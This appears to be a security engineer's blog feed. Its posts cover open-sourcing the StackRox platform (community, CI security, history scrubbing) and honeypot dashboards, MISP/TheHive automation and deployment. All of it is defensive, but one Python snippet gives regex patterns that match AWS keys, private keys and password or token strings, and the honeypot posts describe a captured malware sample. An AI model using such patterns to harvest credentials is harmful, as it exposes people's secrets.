Jekyll2022-10-14T11:10:00+00:00https://maddosaurus.github.io/feed.xmlSaurus Tech BlogHi there! Welcome to this pile of Malware Analysis, OSINT, CTF, ML, SOAR, Automation and more.How to Open Source Your Project (II)2022-07-26T09:00:00+00:002022-07-26T09:00:00+00:00https://maddosaurus.github.io/2022/07/26/stackrox-oss-ii<p>In part 2 of the OSS howto series, we take a look at Community, Collaboration, and Context (read <a href="/2022/07/25/stackrox-oss">part 1 here</a>).
<!--more--></p>
<h2 id="part-ii-community-collaboration-context">Part II: Community, Collaboration, Context</h2>
<h3 id="how-to-enable-healthy-discussion">How To Enable Healthy Discussion?</h3>
<p>As your audience grows, it is vital that you define clear rules to create a safe environment for everyone to participate. A common way of doing this is to define a code of conduct (CoC), which sets some basic guidelines on what kind of community interaction will not be tolerated. We decided to stick to well-established frameworks and based our CoC on the <a href="https://www.contributor-covenant.org/">Contributor Covenant</a>.</p>
<h3 id="how-to-keep-the-discussion-healthy">How To Keep the Discussion Healthy?</h3>
<p>The best CoC definition doesn’t help if there is no one there to enforce it. This meant we needed to find volunteers for a CoC committee and train them accordingly. The committee members should be publicly available and open for communication so they can be approached in case of any problems.<br />
Similar to the responsible disclosure and CVE handling discussed in part 1, I strongly recommend not only having a CoC team in place, but also having them trained on CoC enforcement and communication in case they are newcomers.</p>
<p>We did this by publishing the CoC and the committee members on our <a href="https://www.stackrox.io/code-conduct/">community website</a>.</p>
<blockquote>
<p>As your audience grows, it is vital that you define clear rules to create a safe environment for everyone to participate.</p>
</blockquote>
<p>It is especially important to clearly communicate and enforce the rules you set up, as a safe environment fosters collaboration from your community.</p>
<h3 id="where-to-communicate-with-the-community">Where To Communicate with the Community?</h3>
<p>At this point, you should be aware of the goal of your open source go-live and the expected target audience. Answers to these questions shape how you interact with your community. Use all channels you have to reach out, but decide on one discussion medium out of the plethora available today, such as Slack, Discord, mailing list, forums or Matrix.</p>
<p>The StackRox community currently lives on the <a href="https://www.stackrox.io/slack/">CNCF Slack workspace in the channel #stackrox</a>.</p>
<h3 id="how-to-accept-contributions">How To Accept Contributions?</h3>
<p>Be clear and concise in what you accept from contributors. Is it only feedback in discussions? Do you accept issues or pull requests on GitHub? If so, it is recommended to provide guidelines in the form of a <code class="language-plaintext highlighter-rouge">CONTRIBUTING.md</code> document or Issue/PR templates to fill out.</p>
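<p>As an illustration, a minimal GitHub issue form could look like the following sketch; the file name, field ids, and labels are invented for this example, not taken from the StackRox repositories:</p>

```yaml
# .github/ISSUE_TEMPLATE/bug_report.yml (illustrative)
name: Bug report
description: Report a problem with the platform
body:
  - type: textarea
    id: what-happened
    attributes:
      label: What happened?
      description: Steps to reproduce, expected and actual behaviour
    validations:
      required: true
  - type: input
    id: version
    attributes:
      label: Platform version
```

Templates like this nudge reporters toward providing the details your triage process needs up front.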
<p>If you do accept these, it helps to give people a rough idea of your response times. Also, be sure to have processes in place for deciding who keeps an eye on new items.</p>
<p>For example, we communicate that we aim to triage new issues and PRs within a week, with more detailed discussions and decisions communicated in our monthly meetings.<br />
That said, there is also the broader question of whether to include community contributions in your downstream commercial version.<br />
There are many options for how to do this. Check in with your Product Managers, Customer Support team, and Legal department to make sure you don’t violate any license requirements and have unified messaging for public-facing communication, for community and paid customers alike.</p>
<p>The StackRox team decided to accept community contributions, but clearly mark them as not supported by downstream Enterprise Support.<br />
While this adds some management overhead, as you need to keep track of two issue trackers (e.g. an internal one for downstream and GitHub for upstream), it sets clear expectations for all involved parties.</p>
<h3 id="how-to-meet-with-the-community">How To Meet with the Community?</h3>
<p>Regular public meetings lower the bar for participation and allow for issues to be raised efficiently. Any interested contributors can quickly stop by and get in touch with your project.</p>
<p>Currently, we run our StackRox Community meeting on the second Tuesday of each month at 9 a.m. PST, 12 p.m. EST, 5 p.m. GMT. You can subscribe to the events by adding the calendar [email protected] to your calendar.</p>
<p>In these meetings, we discuss and show demos of upcoming features, talk about open issues, present guides and how-tos, and have an open forum for Q&A with the community.</p>
<h3 id="conclusion">Conclusion</h3>
<p>There is a lot to consider when opening a big commercial project to a broader audience, but tackling it in an organized manner pays off - especially for the engineering team.<br />
As a final recommendation, please take the time to celebrate the go-live with your team and make sure to pass any positive feedback on to them!</p>How to Open Source Your Project (I)2022-07-25T09:35:00+00:002022-07-25T09:35:00+00:00https://maddosaurus.github.io/2022/07/25/stackrox-oss<p>Transitioning a project from private to public development means more than just changing the visibility of the GitHub repositories. In part 1, we take a look at how your product and your team should guide your decisions.
<!--more-->
A version of this article was also published at <a href="https://thenewstack.io/how-to-open-source-your-project-dont-just-open-your-repo/">The New Stack</a>.</p>
<hr />
<p>On April 1, 2022, the release of the StackRox Community Platform was announced.<br />
This is the result of a great deal of work by our team to transition StackRox’s proprietary security platform into an open source one.<br />
I’ve been working behind the scenes and want to share a bit of insight into the challenges that bigger projects might face when opening up.<br />
Transitioning a project from private to public development means more than just changing the visibility of the GitHub repositories. It is essential to have a transition plan, especially if the goal is to build a thriving community where users can grow and leverage the platform.<br />
To have the best chance of success, the project’s goals and the community’s goals should be as aligned as possible.<br />
For the StackRox team, one of our top goals was to set the entry barrier as low as possible for contributors and community users. I’ve personally found this to be a significant challenge.<br />
It is one thing to tailor your environment to engineers, hoping to provide a thorough and guided onboarding experience. Creating a forum for a greater community of developers, operations and security folks poses an entirely different challenge.</p>
<h2 id="part-i-your-product-and-your-engineering-team">Part I: Your Product and Your Engineering Team</h2>
<p>Before you make any decisions, you should be aware of your product and your team.<br />
Obviously, you should know both rather well, but you should also be aware of the broader context of your product and its role compared to competing products.<br />
Last but not least, you should answer the question of what you want to achieve with opening your platform.</p>
<ul>
<li>Are you interested in giving back to the community?</li>
<li>Do you want to grow trust in your product by exposing it to public scrutiny?</li>
<li>Are you interested in broader feedback or reaching a different user group?</li>
</ul>
<p>As soon as you have answered these questions, you can think about the next steps.</p>
<h3 id="what-to-open-source">What To Open Source?</h3>
<p>If you look at the <a href="https://github.com/stackrox">StackRox GitHub organization</a>, you will find a multitude of repositories; the platform comprises many different components and features that could have been kept private. However, we chose to be thorough and take the extra time. We decided to open the complete platform and all its dependencies, including the out-of-the-box policy ruleset that we ship on new installations, prebuilt Docker images, and Helm charts to make the open source deployment as easy as possible.</p>
<p>I’ve been a strong proponent of opening the platform as-is instead of artificially removing parts of it, like predefined rulesets and alerts.<br />
As Kubernetes deployments are highly personalized to the needs of customers, the OOTB rulesets are a good starting point but are usually adapted to the environments’ needs sooner or later. Since we wanted to lower the barrier to entry as much as possible, we decided to ship the platform in its full state to give users a working setup right away.</p>
<h3 id="what-license-to-use">What License To Use?</h3>
<p>When opening your source code, one of the first tasks should be to select a license that fits your use case. In most cases, it is advisable to include your legal department in this discussion, and <a href="https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/licensing-a-repository">GitHub has many great resources</a> to help you with this process. For StackRox, we oriented ourselves on similar Red Hat and popular open source projects and picked Apache 2.0 where possible.</p>
<h3 id="how-can-people-access-it">How Can People Access It?</h3>
<p>After you’ve decided on what parts you open up and how you will open them, the next question is, how will you make this available?</p>
<p>Besides the source code itself, StackRox also ships Docker images, which meant we had to open the CI process to the public as well. Before you do that, I highly recommend reviewing your CI process: assume that any insecure configuration will be used against you, and review common patterns for internal CI processes like credentials, service accounts, deployment keys or storage access.</p>
<p>Also, it should be abundantly clear who can trigger CI runs, as your CI credits/resources are usually quite limited, and CI integrations have been known to <a href="https://www.infoq.com/news/2021/04/GitHub-actions-cryptomining/">run cryptominers</a> or other harmful software.</p>
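<p>A concrete hygiene measure is defaulting your public workflows to a least-privilege token. A hedged GitHub Actions sketch (workflow name and build command are illustrative):</p>

```yaml
# .github/workflows/ci.yml (illustrative)
name: ci
on:
  pull_request:    # PRs from forks get a read-only GITHUB_TOKEN by default
permissions:
  contents: read   # least-privilege default for every job in this workflow
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: make test
```

Combined with required approval for first-time contributors, this keeps fork-triggered runs from reaching your secrets or write-scoped tokens.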
<h2 id="how-to-manage-it">How To Manage It?</h2>
<p>StackRox functions as an upstream public build, whereas Red Hat Advanced Cluster Security (RHACS) is built on an internal Red Hat build system. Tending to two different build pipelines naturally brings some overhead, as the open source and commercial flavors of this project each have different needs.<br />
In general, I would recommend against duplicating your build infrastructure, but sometimes it is inevitable. If you plan to distinguish your OSS and commercial versions, a lot of options are available.<br />
We found build-time feature flags rather practical for managing differences between upstream and downstream.</p>
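<p>StackRox’s actual flag mechanism is not described here, so the following is only a sketch of the general idea: defaults for the upstream flavor, overridden at build or packaging time. The flag names and the <code class="language-plaintext highlighter-rouge">FEATURE_*</code> convention are invented for this example.</p>

```python
import os

# Defaults for the upstream (open source) flavor; a downstream build bakes in
# overrides, e.g. via environment variables set at image build time.
DEFAULTS = {
    "telemetry": False,
    "enterprise_branding": False,
}

def load_flags(env=None):
    """Merge FEATURE_<NAME>=true|false overrides into the defaults."""
    env = os.environ if env is None else env
    flags = dict(DEFAULTS)
    for name in flags:
        raw = env.get("FEATURE_" + name.upper())
        if raw is not None:
            flags[name] = raw.strip().lower() in ("1", "true", "yes")
    return flags
```

Keeping both flavors on one code path with different flag sets avoids the drift that comes with maintaining two diverging branches.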
<p>If all goes well and your CI succeeds, you will most likely end up with some artifact — a release binary, tgz file or Docker image, which raises the next question:</p>
<h3 id="how-to-distribute-it">How To Distribute It?</h3>
<p>Making these artifacts publicly available to lower the barrier of entry is essential.</p>
<p>For StackRox, we decided to push built images to a <a href="https://quay.io/stackrox-io">public organization at Quay</a>. Alternatively, you can use GitHub’s release feature or other public distribution channels, depending on your release artifact type, such as NPM, PyPI, or Crates.<br />
I recommend using established channels as much as possible. If you are building a framework or library, language package managers should be your primary target. If you are building a product that needs deployment, consider publishing Docker images, as these are a well-defined convenience that can run everywhere - from local dev systems to enterprise-grade cloud Kubernetes deployments.<br />
In any case, you should not forget about potential external contributors. Your product most likely requires a very specific toolset to develop and build on. Consider migrating your dev environment into a container - not only for external contributors, but also to give your Engineering team a standardized dev environment.<br />
After distribution, the next step would be users downloading these artifacts and running your product. This brings us to the next important question.</p>
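<p>A containerized dev environment can be as simple as an image with a pinned toolchain; the base image and make targets below are placeholders, not the actual StackRox setup:</p>

```dockerfile
# Dockerfile.dev (illustrative) - one pinned toolchain for all contributors
FROM golang:1.20
RUN apt-get update \
    && apt-get install -y --no-install-recommends git make \
    && rm -rf /var/lib/apt/lists/*
WORKDIR /src
# Mount your checkout and build inside the pinned environment:
#   docker run --rm -v "$PWD":/src dev-image make build
CMD ["make", "build"]
```

This removes “works on my machine” friction for newcomers and keeps CI and local builds on the same toolchain versions.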
<h3 id="how-to-document-it">How To Document It?</h3>
<p>The project documentation is your public representation of the project, inviting users and contributors alike. Potential users will often consult your documentation first to gauge whether your project fits their use case and to understand how to use it most efficiently. Ideally, documentation conveys information to the community while minimizing user confusion - and with it, the number of clarification issues in your GitHub repository.</p>
<blockquote>
<p>Remember that documentation for operators and developers are two very different things.</p>
</blockquote>
<p>For example:</p>
<ul>
<li>Operators are more interested in deployment, configuration, platform maintenance, data preservation, updates and disaster recovery.</li>
<li>Developers are interested in setting up a development environment (IDE, local deployment, debug builds, etc.) and getting access to detailed API descriptions.</li>
</ul>
<p>Both target audiences profit heavily from “Getting Started” guides, be it how to get your first deployment up and running (operators), or how you accomplish everyday extension tasks in the codebase (developers).</p>
<p>Because StackRox is upstream of RHACS, we decided to focus our documentation efforts on developers, as quite a lot of user-tailored documentation is available. Open source-specific user documentation with StackRox branding is a project we’re planning right now, though.</p>
<p>Our developer-tailored documentation is being expanded in the <a href="https://github.com/stackrox/stackrox/blob/master/README.md">main project’s README</a> and <a href="https://github.com/stackrox/dev-docs/">stackrox/dev-docs</a>. The latter is a collection of Markdown guides that initially started as private Confluence articles. This collection keeps growing, especially as we get more feedback from contributors on which guides they would like to see. There is also a continued effort to migrate additional guides and how-tos that might have been missed in the first migration, or that might not have been published because they contain private information.</p>
<h3 id="how-to-manage-privacy--nda-information">How To Manage Privacy & NDA information?</h3>
<p>Speaking of private information: Due to the nature of git, the complete history of your project will be public, starting with the first commit to the repository you publish. This also applies to any issues, discussions and pull requests that your project collected over time. While this is a non-issue for internal development, this can pose quite a problem when going public.</p>
<blockquote>
<p>It is strongly advised that you review all your issues and comments — on GitHub or other git hosts — and scrub the project’s git history, PRs, and Issues of any information or references not intended for public use.</p>
</blockquote>
<p>This information does not need to be public for the project to be considered open source, but it does add context for future users and your own devs, so you might want to keep as much of it intact as possible.</p>
<p>A quick and easy way is to start with a new project on GitHub and do away with your git history. This poses multiple problems, however.</p>
<p>Your engineering team loses the history of their work, problem-solving and discussions, which are valuable resources. Furthermore, this step has to be planned well, and the engineering team must be in the know — if one person pushes their old git history to your new project, the complete history will be accessible again.</p>
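<p>A first pass over exported history (e.g. the output of <code class="language-plaintext highlighter-rouge">git log -p</code> or an issue-tracker dump) can be automated with a simple pattern scan. The patterns below are generic examples; extend them with markers specific to your organisation:</p>

```python
import re

# Generic secret patterns; extend with organisation-specific markers such as
# internal hostnames, ticket prefixes, or NDA-related keywords.
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),  # AWS access key id shape
    re.compile(r"-----BEGIN (?:RSA|EC|OPENSSH) PRIVATE KEY-----"),
    re.compile(r"(?i)(?:password|token)\s*[:=]\s*\S+"),
]

def find_secrets(text):
    """Return every pattern match found in a blob of exported history."""
    hits = []
    for pattern in SECRET_PATTERNS:
        hits.extend(match.group(0) for match in pattern.finditer(text))
    return hits
```

A scan like this is only a safety net for the manual review, not a replacement for it - context-dependent NDA material will not match any regex.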
<h3 id="how-to-handle-cves">How To Handle CVEs?</h3>
<p>Speaking of visibility: If you handle CVE/embargoed work, you will need a workflow in place. As your repository is public, you cannot simply use a public feature branch for this kind of work. For example, GitHub provides the option of <a href="https://docs.github.com/en/code-security/repository-security-advisories/collaborating-in-a-temporary-private-fork-to-resolve-a-repository-security-vulnerability">temporary private forks to resolve security issues</a>.<br />
Due to the time-sensitive nature of this topic, I strongly recommend having a process in place before you open your repository and, more importantly, making everyone aware of it. This includes Engineering as well as Engineering Managers and Management.</p>
<h3 id="how-to-take-care-of-our-people">How To Take Care of Our People?</h3>
<p>Last but not least: As already mentioned, in all of these tasks, you should take care to keep your engineering team involved and in the know at all times.<br />
Community and collaborators are one thing, but your Engineering team are the folks who work full time on your product, so you should take care to keep them happy and motivated.</p>
<p>The Red Hat Advanced Cluster Security (RHACS) engineering team works in a design-document-driven process, where all major changes are discussed between the whole engineering team through shared documents and discussions, written (document comments) and spoken (review meetings).</p>
<p>In the months leading to our announcement, we conducted many discussions and tried to find solutions, workflows and approaches that the team was happy with.</p>
<blockquote>
<p>As the engineering team will still be the main driver for the project, they should know what changes in their daily work once you go open.</p>
</blockquote>
<p>Additionally, this is an excellent opportunity for initial external OSS contributions. If you maintain private forks with product-specific patches, this is the chance to shine by offering these changes to the original upstream projects.</p>
<p>For our engineers, little changed. They still work primarily in the upstream repositories, with the main difference that all pull requests and comments are now publicly visible. This change means that teams need to be mindful of how they communicate, even internally, as all comments can be read by external people who might lack the context or shared humor your team has.</p>
<p>Continue reading in <a href="/2022/07/26/stackrox-oss-ii">part 2</a>, where we take a look at the big C’s: Community, Collaboration, and Context.</p>Honeypot Data Visualization & Automation2021-03-05T16:15:00+00:002021-03-05T16:15:00+00:00https://maddosaurus.github.io/2021/03/05/honeypot-viz<p>After we’ve taken a look at deploying honeypots and collecting their data, the next logical step is to visualize the plethora of collected logs.<br />
<!--more--></p>
<p>This is part 3 of a series detailing visualization, automation, deployment considerations, and pitfalls of Honeypots (<a href="/2020/06/19/honeypot-intro">Part 1</a>, <a href="/2020/11/24/honeypot-deyploment">Part 2</a>).<br />
An extended version of this article and an according talk can be found at <a href="https://vblocalhost.com/conference/presentations/like-bees-to-a-honeypot-a-journey-through-honeypots/">Virus Bulletin 2020</a>.</p>
<p>After successful installation and customization, the deployed Honeypots start generating data. One of the main challenges at this stage is sighting the logs and finding interesting events. Humans aren’t good at sighting big chunks of text; most people can grasp graphics much more quickly.<br />
Hence, having dashboards is a good way of getting a quick overview of what’s happening.</p>
<h2 id="sighting-data">Sighting Data</h2>
<p>The current state of our deployment is this: Logs over logs over logs.<br />
<img src="/images/logs.png" alt="Screenshot of 4 terminal windows filled with logs of different honeypots" /></p>
<p>As logs are not tailored for human consumption, they are notoriously hard to read and check. This is where visualizations come into play. The author recommends ingesting logs into a central system like Elastic or Splunk that indexes the generated data.<br />
Besides making all log data available for Dashboards, it also adds the advantage of making logs of all deployed Honeypots of your whole infrastructure available on a central system. This enables dashboard and report generation across the whole infrastructure and deeper insights.<br />
For the remainder of this article it is assumed that all logs are collected in a central Splunk instance, which is also used for the dashboards shown.
Some key metrics the author finds useful for daily work are:</p>
<ul>
<li>Connecting Source IP</li>
<li>Number of different Source IPs in the last 60 minutes</li>
<li>Top 10 connection counts by Source IP</li>
<li>Username / Password pairs (failed & successful)</li>
<li>SHA256 hashes of captured payloads</li>
<li>List of executed commands (depending on Honeypot)</li>
<li>Unique connection identifiers (i.e. SSH keys or client version strings)</li>
</ul>
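<p>As a sketch of what such metrics look like outside of Splunk, the aggregation boils down to a few counters over parsed JSON events. The field names below follow Cowrie’s log format and are an assumption of this example:</p>

```python
import json
from collections import Counter

def summarize(log_lines):
    """Aggregate JSON honeypot events into a few of the metrics listed above."""
    events = [json.loads(line) for line in log_lines]
    # Connection counts per source IP
    src_ips = Counter(e["src_ip"] for e in events if "src_ip" in e)
    # Username/password pairs from failed login attempts
    credentials = Counter(
        (e["username"], e["password"])
        for e in events
        if e.get("eventid") == "cowrie.login.failed"
    )
    return {
        "unique_source_ips": len(src_ips),
        "top_source_ips": src_ips.most_common(10),
        "top_credentials": credentials.most_common(10),
    }
```

In practice the indexer computes these over a rolling time window; the logic, however, stays this simple.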
<p>Using Dashboards is no turnkey solution for better insight into the produced log data. It is still the user’s responsibility to clean up the data before plotting it. In this context it is worthwhile to borrow <a href="https://www.kdnuggets.com/2018/12/six-steps-master-machine-learning-data-preparation.html">common dataset preparation procedures from the field of Machine Learning</a>. One example is the deduplication of events, i.e. multiple connections from the same source IP. While these duplicates are interesting in some scenarios, e.g. for spotting credential stuffing attacks, they are counterproductive in others, like the absolute count of unique connections in a given timeframe.<br />
<img src="/images/splunk-noise.png" alt="Screenshot of a table consisting of files with different SHA256 hashes but the same filename" /><br />
The screenshot above shows an example of noise in a dashboard. The file <code class="language-plaintext highlighter-rouge">/tmp/up.txt</code> is generated with different content but is always written to the same path. While the file is itself part of an evasion technique, it also fills up dashboards that show the latest found payloads. This is where filtering can help to keep dashboards effective by lowering noise. After validating that the created file is indeed noise, it can be filtered by its path. Nevertheless, the contents of this file might change over time, and with them its importance. With the filter in place, such a change might easily be overlooked. Therefore, continuous data analysis and pattern recognition are required to keep a dashboard valuable and usable.</p>
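<p>Once a file such as <code class="language-plaintext highlighter-rouge">/tmp/up.txt</code> has been validated as noise, the corresponding filter is a one-liner; the event structure below is assumed for illustration:</p>

```python
# Paths validated as noise; revisit this list regularly, since the role of a
# filtered file can change and would otherwise go unnoticed.
NOISE_PATHS = {"/tmp/up.txt"}

def filter_noise(events):
    """Drop payload events whose destination path is known noise."""
    return [e for e in events if e.get("destfile") not in NOISE_PATHS]
```

The same filter expressed in the dashboard query keeps the payload panel focused on genuinely new uploads.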
<h2 id="automating-workflows">Automating Workflows</h2>
<p>At this point the infrastructure consists of several running Honeypots that are producing data, which in turn is sent to a Splunk instance for indexing and dashboard generation.
Having a static dashboard with basic metrics is helpful for getting a grasp on the state of the infrastructure. If Honeypots are used in a more active scenario, e.g. for Threat Hunting, it is favourable to add common lookups and shortcuts to a dashboard to improve initial triage times. The proposed Splunk dashboard therefore contains contextual links to VirusTotal, Shodan and GreyNoise.<br />
<img src="/images/architecture.png" alt="Architecture diagram detailing the different honeypots, their data flow, and integrations to Splunk, MISP and TheHive." /><br />
All encountered SHA256 hashes are direct links to VirusTotal searches, clickable IP addresses refer to Shodan and Autonomous System Numbers (ASNs) are used as a lookup for GreyNoise. These services should provide enough information to decide whether a detailed investigation could lead to interesting insights.<br />
To further decrease the number of manual tasks, one can also consider the usage of Threat Intelligence Platforms like MISP which offer automated enrichment and analysis capabilities for submitted samples. Most Honeypots either already have API capabilities to upload Payloads to a target server or can be retrofitted to do so with little effort. In the showcased infrastructure, Cowrie is configured to query a MISP instance for the SHA256 hash of every encountered payload. If the payload is unknown, a new case is created in MISP and the payload is attached to it. If it was encountered before, a “sighting” event is added to the according case.<br />
The advantage of platforms like MISP is the community aspect and the integrated enrichment capabilities that can give samples and payloads context, IOCs, and analyses of other members of a sharing group. In the presented architecture, this role is fulfilled by a tandem of MISP and TheHive. TheHive is another TIP that focuses more on external integrations and analyzers. In its current state, every encountered payload is uploaded to MISP, followed by an automated case creation in TheHive. This enables analysts to run analyzers with little additional overhead, as they do not need to create case files and upload samples by themselves.<br />
This area of the proposed architecture can also be carried out by a Security Orchestration, Automated Response (SOAR) system to further automate responses and increase analytic capabilities.</p>
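<p>The contextual links mentioned above are plain string templates over the indexed fields. The URL formats below are assumptions based on the public web interfaces of the three services:</p>

```python
def lookup_links(sha256=None, ip=None, asn=None):
    """Build dashboard drill-down URLs for a hash, an IP, and an ASN."""
    links = {}
    if sha256:
        links["virustotal"] = f"https://www.virustotal.com/gui/file/{sha256}"
    if ip:
        links["shodan"] = f"https://www.shodan.io/host/{ip}"
    if asn:
        links["greynoise"] = f"https://viz.greynoise.io/query/?gnql=asn:{asn}"
    return links
```

In Splunk, the equivalent is a drilldown link on the respective table column using the field value as a token.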
<h2 id="example-workflow">Example Workflow</h2>
<p>To illustrate the described system integration and workflows, we assume a file was uploaded to one of the Cowrie SSH Honeypots with the SHA256 hash of <code class="language-plaintext highlighter-rouge">69787a2a5d2e29e44ca372a6c6de09d52ae2ae46d4dda18bf0ee81c07e6e921d</code>. As a first measure of interest, this file can be investigated in the Splunk dashboard:
<img src="/images/links.png" alt="Splunk dashboard with breakout images showing previews of each linked service of the mentioned hash" /><br />
The dashboard already provides some valuable information at first glance. It can be derived that the payload was uploaded using the default credentials for a Raspberry Pi, and the connecting address was geolocated to Switzerland. By clicking on the hash or the IP address, either VirusTotal or Shodan can be checked for initial information. Last but not least, a click on the ASN leads to a GreyNoise query that lists all known systems in this ASN. This can add context to the IP, as it indicates whether the ASN is notorious for malicious traffic.<br />
After this cursory glance it is decided to investigate this sample further. Based on the information provided by Shodan and VirusTotal, the current working hypothesis is that this is a Bash IRC bot distributed by a system with a Raspberry Pi SSH version string.<br />
As the payload was dropped on an integrated SSH honeypot, it has already been uploaded to a connected MISP instance where a new case has been created (or, in the case the payload already exists, a sighting has been added). The event already has the uploaded file attached as a malware sample including some additional metadata like common file hashes, the size in bytes and the entropy. From here on out, it is possible to make use of the MISP ecosystem to share and enrich encountered samples, for example through MISP Communities or MISP Community Feeds, as well as MISP plugins that integrate it with other products.
<img src="/images/misp1.png" alt="MISP overview of the case with all attached artifacts" /><br />
While the community aspect of MISP is its strong suit, other contenders make more effective use of integrations with 3rd party products. The tandem of The Hive and Cortex is an alternative that focuses more on said integrations. It consists of one or multiple Cortex instances that are responsible for running so-called analyzers, which make use of several external services like IBM X-Force, RiskIQ PassiveTotal, or Have I Been Pwned. This is complemented by The Hive, which in turn offers case management, intel collection and templating capabilities.<br />
Additionally, MISP and The Hive can work in two-way-synchronization mode, which unites the strengths of both platforms into an excellent solution for managing, tracking, and optimizing investigations. For the example at hand this means that an incoming Alert for the discovered IRC bot is awaiting its import as a case in The Hive.
<img src="/images/hive.png" alt="Hive overview with results of different lookups" /><br />
The payload and all its observables from MISP are imported and available for use in Cortex analyzers. As these are run, they generate additional observables and reports that can be added to the case at hand, as can be seen in the screenshot. The red tags attached to the hash and the file stem from critical results obtained by querying IBM X-Force and VirusTotal. All added metadata can also be synced back to MISP for integrity and sharing purposes.<br />
At this point, a preliminary examination of the discovered upload was conducted without opening the file itself, which led to the decision to investigate the incident further. The file was added to MISP and The Hive with minimal to no user interaction and made available to enrichment plugins and communities, thereby accelerating and improving the process of manual analysis and investigation.</p>
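<p>The query-then-sight-or-create logic at the core of this workflow can be sketched as a small decision helper. The shape of the MISP attribute search response is an assumption of this example, and the actual HTTP calls are left out:</p>

```python
def misp_action(search_response):
    """Map a MISP attribute search response to the next workflow step.

    Returns "add_sighting" when the hash is already known to MISP,
    otherwise "create_event" so the new payload gets its own case.
    """
    attributes = search_response.get("response", {}).get("Attribute", [])
    return "add_sighting" if attributes else "create_event"
```

In the deployed setup, the honeypot performs the search for every captured payload hash and then issues the corresponding API call.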
<h2 id="conclusions">Conclusions</h2>
<p>Successfully deploying and integrating Honeypots and supporting software into an existing infrastructure can be a daunting task that requires a decent amount of planning. Nevertheless, the advantages are evident:<br />
If integrated correctly, Honeypots enable faster alerting and a pre-emptive view into current attack strategies and automated attacks against publicly available infrastructure, whilst supporting integrations based on TIPs like MISP or The Hive speed up Triaging, improve its quality, and lower the amount of manual work done by Analysts. Combined with widespread log collection and well-designed Dashboards, this complements better defensive strategies and measures against novel attacks.<br />
Especially with the continued popularity of container-based virtualization technologies, high-interaction Honeypots are expected to gain popularity and development traction. As it stands, this type of Honeypot is considerably harder to detect, which makes it well suited for internet-facing deployments. This is because the architecture mitigates most commonly used evasion techniques simply by being a fully custom system that behaves consistently and as close to a real system as possible.<br />
Once deployed, Honeypots are a low-maintenance asset that can bring high value to the table, be it as a pre-emptive alerting system for internal infrastructure or as a sensor for discovering ongoing campaigns and credential stuffing attacks, collecting valuable intelligence without manual interaction.</p>
<p>This concludes the series on honeypots. As a closing note, some resources can be recommended for getting started with custom deployments.<br />
A good overview of common resources and projects is the repo <a href="https://github.com/paralax/awesome-honeypots">awesome-honeypots</a> which can be of great service if a specific service or system is needed.<br />
First and foremost, there is <a href="https://github.com/dtag-dev-sec/tpotce">T-Pot</a>, an all-in-one solution that bundles multiple Honeypots with an Elastic stack, custom dashboards and a multitude of tools. This project is developed by Telekom Security and offers a quick start at the price of customizability. As the project is rather complex and relies heavily on containers, customization of the bundled Honeypots is not as straightforward as in custom deployments. Nevertheless, it is an excellent starting point to get a feeling for deployments.<br />
A step closer to fully customized Honeypots are frameworks that abstract functionality shared between specific implementations. Examples are DutchSec’s <a href="https://github.com/honeytrap/honeytrap">honeytrap</a> and <a href="https://github.com/Cymmetria/honeycomb">Cymmetria’s honeycomb</a>. Frameworks can speed up the development of custom Honeypots, but at the price of a predefined structure, as frameworks rely heavily on conventions to work correctly.<br />
With the release of this paper, the presented Splunk dashboards are made available for general use and can be found <a href="https://github.com/CMSecurity/splunk-hp-dashs">in this repository</a>. This organization also holds repositories with the custom-developed SMTP Honeypot <a href="https://github.com/CMSecurity/mailhon">mailhon</a> as well as an IP Camera Honeypot, <a href="https://github.com/CMSecurity/CameraObscura">CameraObscura</a>. Finally, the last project used in the demonstrated environment is an Android Debug Bridge Honeypot by the name of <a href="https://github.com/huuck/ADBHoney">ADBHoney</a>.<br />
Last but not least, <a href="https://www.honeynet.org/">Honeynet</a> deserves mention as a central research organization dedicated to the continued development of Honeypots as well as to investigations into ongoing attacks.</p>After we’ve taken a look at deploying honeypots and collecting their data, the next logical step is to visualize the plethora of collected logs.Honeypot Deployment and Customization2020-11-24T18:00:00+00:002020-11-24T18:00:00+00:00https://maddosaurus.github.io/2020/11/24/honeypot-deyploment<p>Deploying Honeypots right is not always straightforward and leaves plenty of room for mistakes. Join me for a while to learn about deployment and customization of Honeypots.</p>
<!--more-->
<p>This is part 2 of a series detailing visualization, automation, deployment considerations, and pitfalls of Honeypots (<a href="/2020/06/19/honeypot-intro">Part 1</a>).<br />
An extended version of this article and an according talk can be found at <a href="https://vblocalhost.com/conference/presentations/like-bees-to-a-honeypot-a-journey-through-honeypots/">Virus Bulletin 2020</a>.</p>
<p>The first step to data collection, which is also the most important one, is the deployment of Honeypots. There are multiple pitfalls and recommendations to consider depending on the use case. After a successful deployment, the next step is to collect generated data and possible payloads at a single data sink to enable metrics generation and monitoring of the complete infrastructure.</p>
<h2 id="deployment-considerations">Deployment Considerations</h2>
<p>There are two main scenarios to consider when deploying Honeypots: internal versus internet-facing deployments. Both are valid scenarios but cover different use cases. For the remainder of this paper, we focus on internet-facing deployments for data collection if not stated otherwise.
In an internal deployment, Honeypots act as traps or alert systems. The idea is to deploy them throughout the company infrastructure, preferably near production servers. If an attacker looking for a foothold in the network stumbles upon these strategically placed systems, they will try to use them to persist access. Ideally, these Honeypots have been set up to raise alarms on any incoming connection, as there is no legitimate use for them in daily operations. This scenario supports existing measures like Intrusion Detection Systems or log monitoring as an active component that increases the chances of early intruder detection.<br />
Internet-facing deployments, on the other hand, are tailored towards collecting data on widespread attacks. This can range from basic information like attacked services (e.g. how common are attacks against Android Debug Bridges) or used credentials up to detailed TTP information (e.g. which commands/scripts are executed, attempted lateral movement, persistence techniques and possible evasion attempts). In contrast to internal deployments, these systems are constantly exposed to world-wide traffic. Therefore, they are always to be considered compromised. As these deployments provide no direct protection to an internal network, it is advisable to isolate internet-facing Honeypots completely from production infrastructure.
<img src="/images/deployment.png" alt="Graphic that shows two sample deplyoments. The left is titled "Internal Deployment", showing the honeypot being placed next to production servers. The right is titled "Internet-facing Deployment" and shows the honeypot deployed in a DMZ, separated from all other infrastructure." />
Besides these specifics, we can also derive some general recommendations for all deployment scenarios.<br />
As these systems are considered insecure by design, it is advisable to treat them accordingly. Leaving production data or company information on them is inadvisable, as is reusing usernames, passwords, certificates, and SSH keys. If attackers manage to escape from the Honeypot to the hosting OS, they would otherwise be able to gain valuable information about internal infrastructure and active usernames.<br />
